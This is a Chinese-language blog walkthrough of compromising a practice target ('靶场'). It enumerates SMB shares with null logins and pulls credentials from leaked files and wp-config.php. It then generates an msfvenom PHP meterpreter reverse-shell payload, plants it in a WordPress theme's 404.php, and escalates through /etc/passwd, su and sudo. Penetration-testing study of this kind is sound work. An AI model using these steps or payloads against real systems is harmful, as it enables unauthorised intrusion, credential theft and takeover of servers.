SambaSMB信息泄露(Serve Message Block)
Samba/SMB信息泄露
Serve Message Block
==SMB常用端口为139,445==
==mysql常用端口为3306==
SMB协议用来访问网络资源,下载对应的资源文件
信息探测
nmap -sV ip 探测开放服务
nmap -A -v -T4 ip 探测全部信息(T4——最大线程速度)
==注意特殊端口(大于1024)==
针对SMB协议弱点分析
针对SMB协议,使用空口令,弱口令尝试登陆,并查看敏感文件,下载查看;
1.
1
2
3
4
5
6
7
8smbclient -L ip #表示该ip所有分享的目录和链接
# 输入后需要输入密码,我们直接回车,表示空命令
smbclient '\\ip\share$' # 表示要查看的共享文件夹 share可以替换为其他的如print等
smbclient '\\ip\IPC$' # 登录空链接
get 敏感文件名 # 下载敏感文件打开下载的文件deets.txt,可以发现密码password为12345
再打开wordpress文件夹,然后下载wp-config.php并打开,得到数据库名,用户名user和密码pwd
连接mysql
mysql -h ip -u user -p但是可能无法远程登录mysql,于是尝试ssh登录
ssh 用户名@ip尝试数据库密码,密码错误
针对SMB协议远程溢出漏洞进行分析
1
2
3searchsploit samba版本号
searchsploit Samba smbd 3.X - 4.X发现也没有漏洞
针对HTTP协议弱点分析
1. 浏览器查看网站
2. 使用dirb nicko扫描
dirb http://ip:port/(80端口可省略)
扫描到网站后台目录
打开并输入用户名和密码
3.上传webshell
wordpress有常见漏洞
1 | msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 raw |
然后就是上传webshell,并且执行(访问具有webshell的php页面)
我们将webshell上传到editor的404.php页面
然后打开404页面
1 | http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php |
然后返回攻击机,发现成功监听,查看当前用户,执行以下命令
1 | shell |
发现获得服务器的通用权限
优化终端
1 | python -c "import pty;pty.spawn('/bin/bash')" |
查看当前计算机的用户
1 | cat /etc/passwd |
查看敏感用户,发现一个togie
1 | su togie |
4. 提升权限
查找共享目录下的敏感文件
1 | sudo -l |
- Title: SambaSMB信息泄露(Serve Message Block)
- Author: Dunm1e
- Created at : 2024-09-11 18:53:11
- Updated at : 2024-09-12 08:18:13
- Link: https://dunm1e.github.io/2024/09/11/cfb8804dd1b5/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments